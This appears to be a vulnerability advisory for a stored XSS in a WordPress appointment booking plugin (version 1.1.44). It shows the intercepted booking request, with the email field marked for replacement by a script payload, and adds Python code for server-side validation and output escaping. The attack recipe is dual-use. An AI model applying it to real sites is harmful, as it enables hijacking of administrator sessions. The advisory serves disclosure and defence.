Appointment Hour Booking – WordPress Booking Plugin -- stored XSS
# Vendor Homepage: https://apphourbooking.dwbooster.com/
# Software Link: https://wordpress.org/plugins/appointment-hour-booking/
# Version: 1.1.44
In Appointment Hour Booking – WordPress Booking Plugin it is possible to tamper with the HTTP POST request to bypass front-end data validation and submit an XSS payload that is stored and executed in the administrator's web interface.

The attack requires a public appointment booking form to be present. An attacker enters a valid e-mail address in the "E-mail" field, intercepts the request and replaces the address with an XSS payload.

The payload is then executed in the administrator's browser when they open the booking entries page.

This allows an attacker to execute arbitrary JavaScript, resulting in information disclosure, privilege escalation and modification of the site's source code to obtain RCE.
POST /cve/wordpress/ HTTP/1.1
Host: 192.168.0.191
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.191/cve/wordpress/
Content-Type: multipart/form-data; boundary=---------------------------29750584827203
Content-Length: 1451
DNT: 1
Connection: close
Cookie: PHPSESSID=6mefvemchb9mrm2g9dsjd1r3tn; rand_code_1=74617fe239a71a602469791bde16fe49
Upgrade-Insecure-Requests: 1

-----------------------------29750584827203
Content-Disposition: form-data; name="cp_pform_psequence"

_1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_appbooking_pform_process"

1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_appbooking_id"

1
-----------------------------29750584827203
Content-Disposition: form-data; name="cp_ref_page"

http://192.168.0.191/cve/wordpress/
-----------------------------29750584827203
Content-Disposition: form-data; name="form_structure_1"

-----------------------------29750584827203
Content-Disposition: form-data; name="refpage_1"

http://192.168.0.191/cve/wordpress/
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1"

2019-07-18 10:00/11:00 0 1
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1_services"

0
-----------------------------29750584827203
Content-Disposition: form-data; name="fieldname1_1_capacity"

0
-----------------------------29750584827203
Content-Disposition: form-data; name="tcostfieldname1_1"

1.00
-----------------------------29750584827203
Content-Disposition: form-data; name="email_1"

aaa@a.test <== replace by <script>...</script> payload
-----------------------------29750584827203
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"

ldqli
-----------------------------29750584827203--
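The root cause described above is that the e-mail check happens only in the browser, so a replayed multipart body reaches the database unchecked and is later rendered unencoded in the admin page. The following added example (my own Python, not the plugin's PHP) shows the two server-side controls that close this: re-validating the email_1 field before storage, and HTML-encoding the stored value on output. The field names and boundary are taken from the captured request; the values, the build_body/parse_multipart helpers and the regex are constructed for this illustration.

```python
import html
import re

# Boundary value from the Content-Type header of the captured request.
BOUNDARY = "---------------------------29750584827203"

# Field names come from the captured request; the values are constructed samples.
SAMPLE_FIELDS = {
    "cp_pform_psequence": "_1",
    "cp_appbooking_pform_process": "1",
    "cp_appbooking_id": "1",
    "cp_ref_page": "http://192.168.0.191/cve/wordpress/",
    "fieldname1_1": "2019-07-18 10:00/11:00 0 1",
    "tcostfieldname1_1": "1.00",
    "email_1": "aaa@a.test",
    "hdcaptcha_cp_appbooking_post": "ldqli",
}

# Syntactic e-mail check (constructed, deliberately conservative): no quotes,
# angle brackets or slashes can ever pass, which is what matters for this bug.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def build_body(fields: dict, boundary: str = BOUNDARY) -> bytes:
    """Encode text fields as a multipart/form-data body, the way a browser or an
    intercepting proxy sends it. Used here only to construct test input."""
    out = []
    for name, value in fields.items():
        out.append(f"--{boundary}\r\n")
        out.append(f'Content-Disposition: form-data; name="{name}"\r\n\r\n')
        out.append(f"{value}\r\n")
    out.append(f"--{boundary}--\r\n")
    return "".join(out).encode("utf-8")


def parse_multipart(body: bytes, boundary: str = BOUNDARY) -> dict:
    """Minimal multipart/form-data parser for text-only parts (no file uploads)."""
    fields = {}
    delim = f"--{boundary}".encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter "--boundary--"
            break
        headers, sep, value = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if not sep:
            continue
        m = re.search(rb'name="([^"]*)"', headers)
        if m is None:
            continue
        # Drop the CRLF that precedes the next delimiter; an empty part yields "".
        fields[m.group(1).decode()] = value.removesuffix(b"\r\n").decode("utf-8", "replace")
    return fields


def is_valid_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None


def process_booking(body: bytes) -> dict:
    """Server-side handling: repeat the check the front-end JavaScript is supposed
    to perform. The client is untrusted, so anything that is not syntactically an
    e-mail address is refused before it can be stored."""
    fields = parse_multipart(body)
    value = fields.get("email_1", "")
    if not is_valid_email(value):
        return {"accepted": False, "reason": "email_1 failed server-side validation"}
    return {"accepted": True, "email": value}


def render_admin_cell(stored_value: str) -> str:
    """Second line of defence for the booking entries page: encode on output so a
    stored value is displayed as text and never interpreted as HTML or script."""
    return html.escape(stored_value, quote=True)


if __name__ == "__main__":
    legit = build_body(SAMPLE_FIELDS)
    # Placeholder markup standing in for the tampered field value.
    tampered = build_body({**SAMPLE_FIELDS, "email_1": '"><script>placeholder</script>'})
    print(process_booking(legit))
    print(process_booking(tampered))
    print(render_admin_cell('"><script>placeholder</script>'))
```

Both controls are needed: validation keeps bad data out of the database, while output encoding protects the admin page even for rows that were stored before the fix or that arrive through another path. In the plugin's own PHP the equivalents would be WordPress's is_email() / sanitize_email() on input and esc_html() on output.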